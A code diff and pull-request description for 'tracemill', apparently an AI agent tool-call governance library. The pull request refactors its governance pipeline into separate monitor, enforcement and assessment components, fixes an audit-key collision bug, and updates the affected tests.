-        from tracemill.governance.pipeline import RecommendedAction
+        from tracemill.governance.results import RecommendedAction
 
         esc = EscalationContext(
             canonical_id="sha256:abc",

--- a/tests/unit/test_score_tool_call.py
+++ b/tests/unit/test_score_tool_call.py
@@ -12,7 +12,8 @@ from tracemill.classify.config import get_default_engine
 from tracemill.governance.budget import BudgetTracker
 from tracemill.governance.labeler import GovernanceLabeler
 from tracemill.governance.persistence import SystemStore
-from tracemill.governance.pipeline import GovernancePipeline, RecommendedAction
+from tracemill.governance.pipeline import GovernancePipeline
+from tracemill.governance.results import RecommendedAction
 from tracemill.trace import EventTrace
 
 
@@ -429,7 +430,7 @@ class TestFailClosed:
         assert "RuntimeError" in result.reason
 
     def test_preflight_error_returns_escalate(self, pipeline):
-        with patch.object(pipeline, "preflight_event", side_effect=RuntimeError("crash")):
+        with patch.object(pipeline._scorer, "preflight_event", side_effect=RuntimeError("crash")):
             result = pipeline.score_tool_call(
                 {
                     "tool_name": "bash",


### PR DESCRIPTION
## What & why

Re-architects governance from a ~2384-line `GovernancePipeline` god class into single-responsibility SOLID collaborators, and reframes the model as **observe + enforce**:

- **`SessionMonitor`** — the single writer; observes what the gate allowed (a pipeline stage).
- **`Shield`** — runtime enforcement at the input edge (via framework hooks), *before* an event ever enters the pipeline.
- Both compose one **`Assessor`** (side-effect-free Phase 2/3) over one **`SessionState`** authority.

This resolves the core incoherence ("how can governance gate if it's the last link in the chain?"): the shield gates at the edge; the monitor only ever sees allowed events.

## Key changes

- **Twin-counter collapse** — `SessionState._total_tool_calls` and `_tool_call_count` were the same quantity with two writers, never reconciled. Now one counter, owned by `SessionState`, advanced through one method. *(Deliberate behavior change to gate rate-limit counting; affected gating tests updated.)*
- **8 extracted collaborators:** `SessionRegistry` (residency + single state-creation path), `ContextBuilder` (SessionEvent→EnrichmentContext bridge), `Phase1` (DRY'd mutation sequence), `Assessor`, `MetaCodec` (persistence codec), `Scorer` (read-only preview), `SessionMonitor` (writer), `Shield` (enforcement).
- **`GovernancePipeline` → composition-root facade** — constructs the collaborators and delegates. Public API, SDK `Pipeline`, and CLI surface unchanged.
- **SPEC §22 + README** aligned to the monitor/shield model.
- **Bug fix (found in rubber-duck review):** the SessionEvent scoring path persisted its audit row under the raw `event.id`, unlike the dict path which mints a `score:`-prefixed key in `ToolCallEvent.from_dict`. That collision let a prior score short-circuit `process_event`'s idempotency guard, so the single writer silently dropped a later observation of the same event. `_persist_score` now enforces the `score:` namespace idempotently, with a regression test proven to fail pre-fix.

## Verification

- `1885 passed / 4 skipped` (full suite).
- ruff check + format clean.
- Merges into `main` as a conflict-free fast-forward (merge-base unchanged at `29f4d10`).
- Rubber-duck review verified the epic against the pre-refactor baseline: no regressions, invariants hold (deep-copy `clone_detached`, shared Phase1/Assessor, crash-recovery preserved).

## Known follow-ups (not blockers for this PR)

- **F2 — durability gap (pre-existing, byte-identical in `main`):** the gate's `_db=None` ephemeral state can shadow the writer's DB-backed state via the shared registry map, so `persist_no_commit` no-ops on that path. It's a deliberate thread-safety tradeoff (avoid cross-thread sqlite) and needs its own focused pass — this PR does not introduce it.
- **Docs:** README "Storage sinks" table and SPEC §18 repo structure remain stale (out of this branch's governance scope; §22 is aligned here).

Co-authored-by: Copilot App <223556219+Copilot@users.noreply.github.com>